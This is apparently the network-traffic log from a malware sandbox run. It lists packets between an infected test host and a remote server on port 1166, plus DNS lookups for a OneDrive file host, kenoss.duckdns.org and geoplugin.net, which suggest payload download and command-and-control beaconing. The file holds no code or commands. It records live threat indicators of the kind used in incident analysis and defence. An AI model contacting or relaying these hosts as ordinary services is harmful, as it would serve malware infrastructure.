                                                                                                                                                                                  Apr 24, 2024 07:42:21.107594967 CEST491711166192.168.2.22103.186.117.100
                                                                                                                                                                                  Apr 24, 2024 07:42:21.107708931 CEST116649171103.186.117.100192.168.2.22
                                                                                                                                                                                  Apr 24, 2024 07:42:21.107759953 CEST491711166192.168.2.22103.186.117.100
                                                                                                                                                                                  Apr 24, 2024 07:42:21.112710953 CEST116649171103.186.117.100192.168.2.22
                                                                                                                                                                                  Apr 24, 2024 07:42:21.112812042 CEST116649171103.186.117.100192.168.2.22
                                                                                                                                                                                  Apr 24, 2024 07:42:21.112849951 CEST116649171103.186.117.100192.168.2.22
                                                                                                                                                                                  Apr 24, 2024 07:42:21.112888098 CEST491711166192.168.2.22103.186.117.100
                                                                                                                                                                                  Apr 24, 2024 07:42:21.112905025 CEST116649171103.186.117.100192.168.2.22
                                                                                                                                                                                  Apr 24, 2024 07:42:21.112962008 CEST491711166192.168.2.22103.186.117.100
                                                                                                                                                                                  Apr 24, 2024 07:42:21.113034010 CEST116649171103.186.117.100192.168.2.22
                                                                                                                                                                                  Apr 24, 2024 07:42:21.113073111 CEST116649171103.186.117.100192.168.2.22
                                                                                                                                                                                  Apr 24, 2024 07:42:21.113128901 CEST491711166192.168.2.22103.186.117.100
                                                                                                                                                                                  Apr 24, 2024 07:42:21.113251925 CEST116649171103.186.117.100192.168.2.22
                                                                                                                                                                                  Apr 24, 2024 07:42:21.113313913 CEST116649171103.186.117.100192.168.2.22
                                                                                                                                                                                  Apr 24, 2024 07:42:21.113360882 CEST116649171103.186.117.100192.168.2.22
                                                                                                                                                                                  Apr 24, 2024 07:42:21.113370895 CEST491711166192.168.2.22103.186.117.100
                                                                                                                                                                                  Apr 24, 2024 07:42:21.113398075 CEST116649171103.186.117.100192.168.2.22
                                                                                                                                                                                  Apr 24, 2024 07:42:21.113455057 CEST491711166192.168.2.22103.186.117.100
                                                                                                                                                                                  Apr 24, 2024 07:42:21.113503933 CEST116649171103.186.117.100192.168.2.22
                                                                                                                                                                                  Apr 24, 2024 07:42:21.113558054 CEST116649171103.186.117.100192.168.2.22
                                                                                                                                                                                  Apr 24, 2024 07:42:21.113609076 CEST491711166192.168.2.22103.186.117.100
                                                                                                                                                                                  Apr 24, 2024 07:42:21.113610983 CEST116649171103.186.117.100192.168.2.22
                                                                                                                                                                                  Apr 24, 2024 07:42:21.113648891 CEST116649171103.186.117.100192.168.2.22
                                                                                                                                                                                  Apr 24, 2024 07:42:21.113708019 CEST491711166192.168.2.22103.186.117.100
                                                                                                                                                                                  Apr 24, 2024 07:42:21.113725901 CEST116649171103.186.117.100192.168.2.22
                                                                                                                                                                                  Apr 24, 2024 07:42:21.113795042 CEST116649171103.186.117.100192.168.2.22
                                                                                                                                                                                  Apr 24, 2024 07:42:21.113847017 CEST491711166192.168.2.22103.186.117.100
                                                                                                                                                                                  Apr 24, 2024 07:42:21.113852024 CEST116649171103.186.117.100192.168.2.22
                                                                                                                                                                                  Apr 24, 2024 07:42:21.113898993 CEST116649171103.186.117.100192.168.2.22
                                                                                                                                                                                  Apr 24, 2024 07:42:21.113954067 CEST491711166192.168.2.22103.186.117.100
                                                                                                                                                                                  Apr 24, 2024 07:42:21.113964081 CEST116649171103.186.117.100192.168.2.22
                                                                                                                                                                                  Apr 24, 2024 07:42:21.114020109 CEST116649171103.186.117.100192.168.2.22
                                                                                                                                                                                  Apr 24, 2024 07:42:21.114080906 CEST491711166192.168.2.22103.186.117.100
                                                                                                                                                                                  Apr 24, 2024 07:42:21.114092112 CEST116649171103.186.117.100192.168.2.22
                                                                                                                                                                                  Apr 24, 2024 07:42:21.114130974 CEST116649171103.186.117.100192.168.2.22
                                                                                                                                                                                  Apr 24, 2024 07:42:21.114176035 CEST116649171103.186.117.100192.168.2.22
                                                                                                                                                                                  Apr 24, 2024 07:42:21.114187002 CEST491711166192.168.2.22103.186.117.100
                                                                                                                                                                                  Apr 24, 2024 07:42:21.114223957 CEST116649171103.186.117.100192.168.2.22
                                                                                                                                                                                  Apr 24, 2024 07:42:21.114259005 CEST116649171103.186.117.100192.168.2.22
                                                                                                                                                                                  Apr 24, 2024 07:42:21.114279032 CEST491711166192.168.2.22103.186.117.100
                                                                                                                                                                                  Apr 24, 2024 07:42:21.114350080 CEST116649171103.186.117.100192.168.2.22
                                                                                                                                                                                  Apr 24, 2024 07:42:21.114407063 CEST116649171103.186.117.100192.168.2.22
                                                                                                                                                                                  Apr 24, 2024 07:42:21.114414930 CEST491711166192.168.2.22103.186.117.100
                                                                                                                                                                                  Apr 24, 2024 07:42:21.114516973 CEST116649171103.186.117.100192.168.2.22
                                                                                                                                                                                  Apr 24, 2024 07:42:21.114556074 CEST116649171103.186.117.100192.168.2.22
                                                                                                                                                                                  Apr 24, 2024 07:42:21.114573002 CEST491711166192.168.2.22103.186.117.100
                                                                                                                                                                                  Apr 24, 2024 07:42:21.114619970 CEST116649171103.186.117.100192.168.2.22
                                                                                                                                                                                  Apr 24, 2024 07:42:21.114667892 CEST116649171103.186.117.100192.168.2.22
                                                                                                                                                                                  Apr 24, 2024 07:42:21.114670992 CEST491711166192.168.2.22103.186.117.100
                                                                                                                                                                                  Apr 24, 2024 07:42:21.114729881 CEST116649171103.186.117.100192.168.2.22
                                                                                                                                                                                  Apr 24, 2024 07:42:21.114809036 CEST491711166192.168.2.22103.186.117.100
                                                                                                                                                                                  Apr 24, 2024 07:42:21.115957975 CEST116649171103.186.117.100192.168.2.22
                                                                                                                                                                                  Apr 24, 2024 07:42:21.116034985 CEST116649171103.186.117.100192.168.2.22
                                                                                                                                                                                  Apr 24, 2024 07:42:21.116113901 CEST491711166192.168.2.22103.186.117.100
                                                                                                                                                                                  Apr 24, 2024 07:42:21.116220951 CEST116649171103.186.117.100192.168.2.22
                                                                                                                                                                                  Apr 24, 2024 07:42:21.116277933 CEST116649171103.186.117.100192.168.2.22
                                                                                                                                                                                  Apr 24, 2024 07:42:21.116329908 CEST491711166192.168.2.22103.186.117.100
                                                                                                                                                                                  Apr 24, 2024 07:42:21.116334915 CEST116649171103.186.117.100192.168.2.22
                                                                                                                                                                                  Apr 24, 2024 07:42:21.116380930 CEST116649171103.186.117.100192.168.2.22
                                                                                                                                                                                  Apr 24, 2024 07:42:21.116427898 CEST116649171103.186.117.100192.168.2.22
                                                                                                                                                                                  Apr 24, 2024 07:42:21.116434097 CEST491711166192.168.2.22103.186.117.100
                                                                                                                                                                                  Apr 24, 2024 07:42:21.116482019 CEST116649171103.186.117.100192.168.2.22
                                                                                                                                                                                  Apr 24, 2024 07:42:21.116534948 CEST491711166192.168.2.22103.186.117.100
                                                                                                                                                                                  Apr 24, 2024 07:42:21.116580963 CEST116649171103.186.117.100192.168.2.22
                                                                                                                                                                                  Apr 24, 2024 07:42:21.116630077 CEST116649171103.186.117.100192.168.2.22
                                                                                                                                                                                  Apr 24, 2024 07:42:21.116693020 CEST491711166192.168.2.22103.186.117.100
                                                                                                                                                                                  Apr 24, 2024 07:42:21.116703987 CEST116649171103.186.117.100192.168.2.22
                                                                                                                                                                                  Apr 24, 2024 07:42:21.116760969 CEST116649171103.186.117.100192.168.2.22
                                                                                                                                                                                  Apr 24, 2024 07:42:21.116812944 CEST491711166192.168.2.22103.186.117.100
                                                                                                                                                                                  Apr 24, 2024 07:42:21.116817951 CEST116649171103.186.117.100192.168.2.22
                                                                                                                                                                                  Apr 24, 2024 07:42:21.116872072 CEST116649171103.186.117.100192.168.2.22
                                                                                                                                                                                  Apr 24, 2024 07:42:21.116933107 CEST491711166192.168.2.22103.186.117.100
                                                                                                                                                                                  Apr 24, 2024 07:42:21.116950035 CEST116649171103.186.117.100192.168.2.22
                                                                                                                                                                                  Apr 24, 2024 07:42:21.116988897 CEST116649171103.186.117.100192.168.2.22
                                                                                                                                                                                  Apr 24, 2024 07:42:21.117048979 CEST491711166192.168.2.22103.186.117.100
                                                                                                                                                                                  Apr 24, 2024 07:42:21.117063046 CEST116649171103.186.117.100192.168.2.22
                                                                                                                                                                                  Apr 24, 2024 07:42:21.117124081 CEST116649171103.186.117.100192.168.2.22
                                                                                                                                                                                  Apr 24, 2024 07:42:21.117171049 CEST116649171103.186.117.100192.168.2.22
                                                                                                                                                                                  Apr 24, 2024 07:42:21.117177010 CEST491711166192.168.2.22103.186.117.100
                                                                                                                                                                                  Apr 24, 2024 07:42:21.117228985 CEST116649171103.186.117.100192.168.2.22
                                                                                                                                                                                  Apr 24, 2024 07:42:21.117275953 CEST116649171103.186.117.100192.168.2.22
                                                                                                                                                                                  Apr 24, 2024 07:42:21.117311954 CEST491711166192.168.2.22103.186.117.100
                                                                                                                                                                                  Apr 24, 2024 07:42:21.117330074 CEST116649171103.186.117.100192.168.2.22
                                                                                                                                                                                  Apr 24, 2024 07:42:21.117386103 CEST116649171103.186.117.100192.168.2.22
                                                                                                                                                                                  Apr 24, 2024 07:42:21.117392063 CEST491711166192.168.2.22103.186.117.100
                                                                                                                                                                                  Apr 24, 2024 07:42:21.117434978 CEST116649171103.186.117.100192.168.2.22
                                                                                                                                                                                  Apr 24, 2024 07:42:21.117471933 CEST116649171103.186.117.100192.168.2.22
                                                                                                                                                                                  Apr 24, 2024 07:42:21.117494106 CEST491711166192.168.2.22103.186.117.100
                                                                                                                                                                                  Apr 24, 2024 07:42:21.117562056 CEST116649171103.186.117.100192.168.2.22
                                                                                                                                                                                  Apr 24, 2024 07:42:21.117654085 CEST491711166192.168.2.22103.186.117.100
                                                                                                                                                                                  Apr 24, 2024 07:42:21.117697001 CEST116649171103.186.117.100192.168.2.22
                                                                                                                                                                                  Apr 24, 2024 07:42:21.117754936 CEST116649171103.186.117.100192.168.2.22
                                                                                                                                                                                  Apr 24, 2024 07:42:21.117810011 CEST116649171103.186.117.100192.168.2.22
                                                                                                                                                                                  Apr 24, 2024 07:42:21.117810011 CEST491711166192.168.2.22103.186.117.100
                                                                                                                                                                                  Apr 24, 2024 07:42:21.117882967 CEST116649171103.186.117.100192.168.2.22
                                                                                                                                                                                  Apr 24, 2024 07:42:21.117930889 CEST116649171103.186.117.100192.168.2.22
                                                                                                                                                                                  Apr 24, 2024 07:42:21.117943048 CEST491711166192.168.2.22103.186.117.100
                                                                                                                                                                                  Apr 24, 2024 07:42:21.117985964 CEST116649171103.186.117.100192.168.2.22
                                                                                                                                                                                  Apr 24, 2024 07:42:21.118048906 CEST491711166192.168.2.22103.186.117.100
                                                                                                                                                                                  Apr 24, 2024 07:42:21.118057966 CEST116649171103.186.117.100192.168.2.22
                                                                                                                                                                                  Apr 24, 2024 07:42:21.118094921 CEST116649171103.186.117.100192.168.2.22
                                                                                                                                                                                  Apr 24, 2024 07:42:21.118130922 CEST116649171103.186.117.100192.168.2.22
                                                                                                                                                                                  Apr 24, 2024 07:42:21.118161917 CEST491711166192.168.2.22103.186.117.100
                                                                                                                                                                                  Apr 24, 2024 07:42:21.316394091 CEST491711166192.168.2.22103.186.117.100
                                                                                                                                                                                  Apr 24, 2024 07:42:30.456053019 CEST49174443192.168.2.2213.107.137.11
                                                                                                                                                                                  Apr 24, 2024 07:42:30.456151009 CEST4434917413.107.137.11192.168.2.22
                                                                                                                                                                                  Apr 24, 2024 07:42:30.456407070 CEST49174443192.168.2.2213.107.137.11
                                                                                                                                                                                  Apr 24, 2024 07:42:30.456940889 CEST49174443192.168.2.2213.107.137.11
                                                                                                                                                                                  Apr 24, 2024 07:42:30.457075119 CEST4434917413.107.137.11192.168.2.22
                                                                                                                                                                                  Apr 24, 2024 07:42:30.457153082 CEST49174443192.168.2.2213.107.137.11
                                                                                                                                                                                  Apr 24, 2024 07:42:30.894704103 CEST49175443192.168.2.2213.107.137.11
                                                                                                                                                                                  Apr 24, 2024 07:42:30.894798040 CEST4434917513.107.137.11192.168.2.22
                                                                                                                                                                                  Apr 24, 2024 07:42:30.894861937 CEST49175443192.168.2.2213.107.137.11
                                                                                                                                                                                  Apr 24, 2024 07:42:30.974582911 CEST49175443192.168.2.2213.107.137.11
                                                                                                                                                                                  Apr 24, 2024 07:42:30.974651098 CEST4434917513.107.137.11192.168.2.22
                                                                                                                                                                                  Apr 24, 2024 07:42:31.496941090 CEST4434917513.107.137.11192.168.2.22
                                                                                                                                                                                  Apr 24, 2024 07:42:31.497081041 CEST49175443192.168.2.2213.107.137.11
                                                                                                                                                                                  Apr 24, 2024 07:42:31.504842997 CEST49175443192.168.2.2213.107.137.11
                                                                                                                                                                                  Apr 24, 2024 07:42:31.504865885 CEST4434917513.107.137.11192.168.2.22
                                                                                                                                                                                  Apr 24, 2024 07:42:31.505235910 CEST4434917513.107.137.11192.168.2.22
                                                                                                                                                                                  Apr 24, 2024 07:42:31.628544092 CEST49175443192.168.2.2213.107.137.11
                                                                                                                                                                                  Apr 24, 2024 07:42:31.631001949 CEST116649170103.186.117.100192.168.2.22
                                                                                                                                                                                  Apr 24, 2024 07:42:31.640774012 CEST491701166192.168.2.22103.186.117.100
                                                                                                                                                                                  Apr 24, 2024 07:42:31.672162056 CEST4434917513.107.137.11192.168.2.22
                                                                                                                                                                                  Apr 24, 2024 07:42:32.096164942 CEST116649170103.186.117.100192.168.2.22
                                                                                                                                                                                  Apr 24, 2024 07:42:32.490641117 CEST4434917513.107.137.11192.168.2.22
                                                                                                                                                                                  Apr 24, 2024 07:42:32.490833044 CEST4434917513.107.137.11192.168.2.22
                                                                                                                                                                                  Apr 24, 2024 07:42:32.490969896 CEST49175443192.168.2.2213.107.137.11
                                                                                                                                                                                  Apr 24, 2024 07:42:32.514158964 CEST49175443192.168.2.2213.107.137.11
                                                                                                                                                                                  Apr 24, 2024 07:42:32.514183998 CEST4434917513.107.137.11192.168.2.22
                                                                                                                                                                                  Apr 24, 2024 07:42:32.514200926 CEST49175443192.168.2.2213.107.137.11
                                                                                                                                                                                  Apr 24, 2024 07:42:32.514208078 CEST4434917513.107.137.11192.168.2.22
                                                                                                                                                                                  Apr 24, 2024 07:42:34.301701069 CEST491711166192.168.2.22103.186.117.100
                                                                                                                                                                                  Apr 24, 2024 07:42:34.704651117 CEST116649171103.186.117.100192.168.2.22
                                                                                                                                                                                  Apr 24, 2024 07:42:34.704749107 CEST491711166192.168.2.22103.186.117.100
                                                                                                                                                                                  Apr 24, 2024 07:42:35.051053047 CEST116649171103.186.117.100192.168.2.22
                                                                                                                                                                                  Apr 24, 2024 07:42:35.051100016 CEST116649171103.186.117.100192.168.2.22
                                                                                                                                                                                  Apr 24, 2024 07:42:35.051156044 CEST491711166192.168.2.22103.186.117.100
                                                                                                                                                                                  Apr 24, 2024 07:42:35.051156998 CEST491711166192.168.2.22103.186.117.100
                                                                                                                                                                                  Apr 24, 2024 07:42:35.401547909 CEST116649171103.186.117.100192.168.2.22
                                                                                                                                                                                  Apr 24, 2024 07:42:35.401587963 CEST116649171103.186.117.100192.168.2.22
                                                                                                                                                                                  Apr 24, 2024 07:42:35.401627064 CEST491711166192.168.2.22103.186.117.100
                                                                                                                                                                                  Apr 24, 2024 07:42:35.401654005 CEST116649171103.186.117.100192.168.2.22
                                                                                                                                                                                  Apr 24, 2024 07:42:35.401686907 CEST116649171103.186.117.100192.168.2.22
                                                                                                                                                                                  Apr 24, 2024 07:42:35.759519100 CEST116649171103.186.117.100192.168.2.22
                                                                                                                                                                                  Apr 24, 2024 07:42:35.764511108 CEST116649171103.186.117.100192.168.2.22
                                                                                                                                                                                  Apr 24, 2024 07:42:35.764607906 CEST491711166192.168.2.22103.186.117.100
                                                                                                                                                                                  Apr 24, 2024 07:42:40.226217985 CEST49177443192.168.2.2213.107.137.11
                                                                                                                                                                                  Apr 24, 2024 07:42:40.226288080 CEST4434917713.107.137.11192.168.2.22
                                                                                                                                                                                  Apr 24, 2024 07:42:40.226336956 CEST49177443192.168.2.2213.107.137.11
                                                                                                                                                                                  Apr 24, 2024 07:42:40.226461887 CEST49177443192.168.2.2213.107.137.11
                                                                                                                                                                                  Apr 24, 2024 07:42:40.226618052 CEST4434917713.107.137.11192.168.2.22
                                                                                                                                                                                  Apr 24, 2024 07:42:40.226667881 CEST49177443192.168.2.2213.107.137.11
                                                                                                                                                                                  Apr 24, 2024 07:42:40.692372084 CEST49178443192.168.2.2213.107.137.11
                                                                                                                                                                                  Apr 24, 2024 07:42:40.692414999 CEST4434917813.107.137.11192.168.2.22
                                                                                                                                                                                  Apr 24, 2024 07:42:40.692468882 CEST49178443192.168.2.2213.107.137.11
                                                                                                                                                                                  Apr 24, 2024 07:42:40.702019930 CEST49178443192.168.2.2213.107.137.11
                                                                                                                                                                                  Apr 24, 2024 07:42:40.702037096 CEST4434917813.107.137.11192.168.2.22
                                                                                                                                                                                  Apr 24, 2024 07:42:41.223186016 CEST4434917813.107.137.11192.168.2.22
                                                                                                                                                                                  Apr 24, 2024 07:42:41.223248959 CEST49178443192.168.2.2213.107.137.11
                                                                                                                                                                                  Apr 24, 2024 07:42:41.227395058 CEST49178443192.168.2.2213.107.137.11
                                                                                                                                                                                  Apr 24, 2024 07:42:41.227408886 CEST4434917813.107.137.11192.168.2.22
                                                                                                                                                                                  Apr 24, 2024 07:42:41.227793932 CEST4434917813.107.137.11192.168.2.22
                                                                                                                                                                                  Apr 24, 2024 07:42:41.333286047 CEST49178443192.168.2.2213.107.137.11
                                                                                                                                                                                  Apr 24, 2024 07:42:41.380116940 CEST4434917813.107.137.11192.168.2.22
                                                                                                                                                                                  Apr 24, 2024 07:42:42.220855951 CEST4434917813.107.137.11192.168.2.22
                                                                                                                                                                                  Apr 24, 2024 07:42:42.220935106 CEST4434917813.107.137.11192.168.2.22
                                                                                                                                                                                  Apr 24, 2024 07:42:42.221395016 CEST49178443192.168.2.2213.107.137.11
                                                                                                                                                                                  Apr 24, 2024 07:42:42.221539974 CEST49178443192.168.2.2213.107.137.11
                                                                                                                                                                                  Apr 24, 2024 07:42:42.221559048 CEST4434917813.107.137.11192.168.2.22
                                                                                                                                                                                  Apr 24, 2024 07:42:42.221590996 CEST49178443192.168.2.2213.107.137.11
                                                                                                                                                                                  Apr 24, 2024 07:42:42.221596956 CEST4434917813.107.137.11192.168.2.22
                                                                                                                                                                                  Apr 24, 2024 07:43:00.192512989 CEST49180443192.168.2.2213.107.137.11
                                                                                                                                                                                  Apr 24, 2024 07:43:00.192554951 CEST4434918013.107.137.11192.168.2.22
                                                                                                                                                                                  Apr 24, 2024 07:43:00.192625046 CEST49180443192.168.2.2213.107.137.11
                                                                                                                                                                                  Apr 24, 2024 07:43:00.192854881 CEST49180443192.168.2.2213.107.137.11
                                                                                                                                                                                  Apr 24, 2024 07:43:00.192905903 CEST4434918013.107.137.11192.168.2.22
                                                                                                                                                                                  Apr 24, 2024 07:43:00.192962885 CEST49180443192.168.2.2213.107.137.11
                                                                                                                                                                                  Apr 24, 2024 07:43:00.558454990 CEST49181443192.168.2.2213.107.137.11
                                                                                                                                                                                  Apr 24, 2024 07:43:00.558495998 CEST4434918113.107.137.11192.168.2.22
                                                                                                                                                                                  Apr 24, 2024 07:43:00.558691978 CEST49181443192.168.2.2213.107.137.11
                                                                                                                                                                                  Apr 24, 2024 07:43:00.560870886 CEST49181443192.168.2.2213.107.137.11
                                                                                                                                                                                  Apr 24, 2024 07:43:00.560898066 CEST4434918113.107.137.11192.168.2.22
                                                                                                                                                                                  Apr 24, 2024 07:43:01.082505941 CEST4434918113.107.137.11192.168.2.22
                                                                                                                                                                                  Apr 24, 2024 07:43:01.082767010 CEST49181443192.168.2.2213.107.137.11
                                                                                                                                                                                  Apr 24, 2024 07:43:01.088368893 CEST49181443192.168.2.2213.107.137.11
                                                                                                                                                                                  Apr 24, 2024 07:43:01.088404894 CEST4434918113.107.137.11192.168.2.22
                                                                                                                                                                                  Apr 24, 2024 07:43:01.088675022 CEST4434918113.107.137.11192.168.2.22
                                                                                                                                                                                  Apr 24, 2024 07:43:01.235819101 CEST49181443192.168.2.2213.107.137.11
                                                                                                                                                                                  Apr 24, 2024 07:43:01.280123949 CEST4434918113.107.137.11192.168.2.22
                                                                                                                                                                                  Apr 24, 2024 07:43:01.646579027 CEST116649170103.186.117.100192.168.2.22
                                                                                                                                                                                  Apr 24, 2024 07:43:01.654573917 CEST491701166192.168.2.22103.186.117.100
                                                                                                                                                                                  Apr 24, 2024 07:43:02.112210989 CEST116649170103.186.117.100192.168.2.22
                                                                                                                                                                                  Apr 24, 2024 07:43:02.146704912 CEST4434918113.107.137.11192.168.2.22
                                                                                                                                                                                  Apr 24, 2024 07:43:02.146894932 CEST4434918113.107.137.11192.168.2.22
                                                                                                                                                                                  Apr 24, 2024 07:43:02.147033930 CEST49181443192.168.2.2213.107.137.11
                                                                                                                                                                                  Apr 24, 2024 07:43:02.153609991 CEST49181443192.168.2.2213.107.137.11
                                                                                                                                                                                  Apr 24, 2024 07:43:02.153630018 CEST4434918113.107.137.11192.168.2.22
                                                                                                                                                                                  Apr 24, 2024 07:43:02.153652906 CEST49181443192.168.2.2213.107.137.11
                                                                                                                                                                                  Apr 24, 2024 07:43:02.153657913 CEST4434918113.107.137.11192.168.2.22
                                                                                                                                                                                  Apr 24, 2024 07:43:31.663748026 CEST116649170103.186.117.100192.168.2.22
                                                                                                                                                                                  Apr 24, 2024 07:43:31.893485069 CEST491701166192.168.2.22103.186.117.100
                                                                                                                                                                                  Apr 24, 2024 07:43:36.716020107 CEST491701166192.168.2.22103.186.117.100
                                                                                                                                                                                  Apr 24, 2024 07:43:37.174587011 CEST116649170103.186.117.100192.168.2.22
                                                                                                                                                                                  Apr 24, 2024 07:43:41.319057941 CEST4917380192.168.2.22178.237.33.50
                                                                                                                                                                                  Apr 24, 2024 07:43:42.178029060 CEST4917380192.168.2.22178.237.33.50
                                                                                                                                                                                  Apr 24, 2024 07:43:43.778119087 CEST4917380192.168.2.22178.237.33.50
                                                                                                                                                                                  Apr 24, 2024 07:43:46.978297949 CEST4917380192.168.2.22178.237.33.50
                                                                                                                                                                                  Apr 24, 2024 07:43:53.277690887 CEST4917380192.168.2.22178.237.33.50
                                                                                                                                                                                  Apr 24, 2024 07:44:01.677664042 CEST116649170103.186.117.100192.168.2.22
                                                                                                                                                                                  Apr 24, 2024 07:44:01.695847988 CEST491701166192.168.2.22103.186.117.100
                                                                                                                                                                                  Apr 24, 2024 07:44:02.159898043 CEST116649170103.186.117.100192.168.2.22
                                                                                                                                                                                  Apr 24, 2024 07:44:05.777524948 CEST4917380192.168.2.22178.237.33.50
                                                                                                                                                                                  Apr 24, 2024 07:44:30.777934074 CEST4917380192.168.2.22178.237.33.50
                                                                                                                                                                                  Apr 24, 2024 07:44:31.694493055 CEST116649170103.186.117.100192.168.2.22
                                                                                                                                                                                  Apr 24, 2024 07:44:31.696949005 CEST491701166192.168.2.22103.186.117.100
                                                                                                                                                                                  Apr 24, 2024 07:44:32.128310919 CEST116649170103.186.117.100192.168.2.22
                                                                                                                                                                                  Apr 24, 2024 07:45:01.708560944 CEST116649170103.186.117.100192.168.2.22
                                                                                                                                                                                  Apr 24, 2024 07:45:01.709825039 CEST491701166192.168.2.22103.186.117.100
                                                                                                                                                                                  Apr 24, 2024 07:45:02.143243074 CEST116649170103.186.117.100192.168.2.22
                                                                                                                                                                                  Apr 24, 2024 07:45:31.725519896 CEST116649170103.186.117.100192.168.2.22
                                                                                                                                                                                  Apr 24, 2024 07:45:31.905307055 CEST491701166192.168.2.22103.186.117.100
                                                                                                                                                                                  Apr 24, 2024 07:45:32.362241983 CEST116649170103.186.117.100192.168.2.22

                                                                                                                                                                                  UDP Packets

                                                                                                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                  Apr 24, 2024 07:42:00.926650047 CEST5456253192.168.2.228.8.8.8
                                                                                                                                                                                  Apr 24, 2024 07:42:01.191095114 CEST5291753192.168.2.228.8.8.8
                                                                                                                                                                                  Apr 24, 2024 07:42:01.374758005 CEST6275153192.168.2.228.8.8.8
                                                                                                                                                                                  Apr 24, 2024 07:42:03.265760899 CEST5789353192.168.2.228.8.8.8
                                                                                                                                                                                  Apr 24, 2024 07:42:03.472779989 CEST5482153192.168.2.228.8.8.8
                                                                                                                                                                                  Apr 24, 2024 07:42:09.081378937 CEST5471953192.168.2.228.8.8.8
                                                                                                                                                                                  Apr 24, 2024 07:42:09.371095896 CEST4988153192.168.2.228.8.8.8
                                                                                                                                                                                  Apr 24, 2024 07:42:10.181782007 CEST5499853192.168.2.228.8.8.8
                                                                                                                                                                                  Apr 24, 2024 07:42:12.670950890 CEST5278153192.168.2.228.8.8.8
                                                                                                                                                                                  Apr 24, 2024 07:42:12.858266115 CEST6392653192.168.2.228.8.8.8
                                                                                                                                                                                  Apr 24, 2024 07:42:15.266556025 CEST6551053192.168.2.228.8.8.8
                                                                                                                                                                                  Apr 24, 2024 07:42:15.511465073 CEST53655108.8.8.8192.168.2.22
                                                                                                                                                                                  Apr 24, 2024 07:42:17.369250059 CEST6267253192.168.2.228.8.8.8
                                                                                                                                                                                  Apr 24, 2024 07:42:17.544903994 CEST53626728.8.8.8192.168.2.22
                                                                                                                                                                                  Apr 24, 2024 07:42:17.545408964 CEST6267253192.168.2.228.8.8.8
                                                                                                                                                                                  Apr 24, 2024 07:42:17.717619896 CEST53626728.8.8.8192.168.2.22
                                                                                                                                                                                  Apr 24, 2024 07:42:17.717854977 CEST6267253192.168.2.228.8.8.8
                                                                                                                                                                                  Apr 24, 2024 07:42:17.888144970 CEST53626728.8.8.8192.168.2.22
                                                                                                                                                                                  Apr 24, 2024 07:42:17.888453007 CEST6267253192.168.2.228.8.8.8
                                                                                                                                                                                  Apr 24, 2024 07:42:18.058909893 CEST53626728.8.8.8192.168.2.22
                                                                                                                                                                                  Apr 24, 2024 07:42:30.256521940 CEST5647553192.168.2.228.8.8.8
                                                                                                                                                                                  Apr 24, 2024 07:42:30.530210018 CEST4938453192.168.2.228.8.8.8
                                                                                                                                                                                  Apr 24, 2024 07:42:30.706381083 CEST5484253192.168.2.228.8.8.8
                                                                                                                                                                                  Apr 24, 2024 07:42:32.674868107 CEST5810553192.168.2.228.8.8.8
                                                                                                                                                                                  Apr 24, 2024 07:42:33.252065897 CEST6492853192.168.2.228.8.8.8
                                                                                                                                                                                  Apr 24, 2024 07:42:39.826627016 CEST5739053192.168.2.228.8.8.8
                                                                                                                                                                                  Apr 24, 2024 07:42:40.332588911 CEST5809553192.168.2.228.8.8.8
                                                                                                                                                                                  Apr 24, 2024 07:42:40.521725893 CEST5426153192.168.2.228.8.8.8
                                                                                                                                                                                  Apr 24, 2024 07:42:42.227965117 CEST6050753192.168.2.228.8.8.8
                                                                                                                                                                                  Apr 24, 2024 07:42:42.576282024 CEST5044653192.168.2.228.8.8.8
                                                                                                                                                                                  Apr 24, 2024 07:43:00.015702963 CEST5593953192.168.2.228.8.8.8
                                                                                                                                                                                  Apr 24, 2024 07:43:00.213288069 CEST4960853192.168.2.228.8.8.8
                                                                                                                                                                                  Apr 24, 2024 07:43:00.387130976 CEST6148653192.168.2.228.8.8.8
                                                                                                                                                                                  Apr 24, 2024 07:43:02.156589985 CEST6245353192.168.2.228.8.8.8
                                                                                                                                                                                  Apr 24, 2024 07:43:02.339688063 CEST5056853192.168.2.228.8.8.8

                                                                                                                                                                                  DNS Queries

                                                                                                                                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                  Apr 24, 2024 07:42:00.926650047 CEST192.168.2.228.8.8.80xbe59Standard query (0)onedrive.live.comA (IP address)IN (0x0001)false
                                                                                                                                                                                  Apr 24, 2024 07:42:01.191095114 CEST192.168.2.228.8.8.80xd1d7Standard query (0)onedrive.live.comA (IP address)IN (0x0001)false
                                                                                                                                                                                  Apr 24, 2024 07:42:01.374758005 CEST192.168.2.228.8.8.80x3c3aStandard query (0)onedrive.live.comA (IP address)IN (0x0001)false
                                                                                                                                                                                  Apr 24, 2024 07:42:03.265760899 CEST192.168.2.228.8.8.80x4664Standard query (0)oqgpra.db.files.1drv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                  Apr 24, 2024 07:42:03.472779989 CEST192.168.2.228.8.8.80x9288Standard query (0)oqgpra.db.files.1drv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                  Apr 24, 2024 07:42:09.081378937 CEST192.168.2.228.8.8.80xfb58Standard query (0)onedrive.live.comA (IP address)IN (0x0001)false
                                                                                                                                                                                  Apr 24, 2024 07:42:09.371095896 CEST192.168.2.228.8.8.80xfbdbStandard query (0)onedrive.live.comA (IP address)IN (0x0001)false
                                                                                                                                                                                  Apr 24, 2024 07:42:10.181782007 CEST192.168.2.228.8.8.80x9fbcStandard query (0)onedrive.live.comA (IP address)IN (0x0001)false
                                                                                                                                                                                  Apr 24, 2024 07:42:12.670950890 CEST192.168.2.228.8.8.80x677eStandard query (0)oqgpra.db.files.1drv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                  Apr 24, 2024 07:42:12.858266115 CEST192.168.2.228.8.8.80xfbb2Standard query (0)oqgpra.db.files.1drv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                  Apr 24, 2024 07:42:15.266556025 CEST192.168.2.228.8.8.80x5f87Standard query (0)kenoss.duckdns.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                  Apr 24, 2024 07:42:17.369250059 CEST192.168.2.228.8.8.80xed20Standard query (0)geoplugin.netA (IP address)IN (0x0001)false
                                                                                                                                                                                  Apr 24, 2024 07:42:17.545408964 CEST192.168.2.228.8.8.80xed20Standard query (0)geoplugin.netA (IP address)IN (0x0001)false
                                                                                                                                                                                  Apr 24, 2024 07:42:17.717854977 CEST192.168.2.228.8.8.80xed20Standard query (0)geoplugin.netA (IP address)IN (0x0001)false
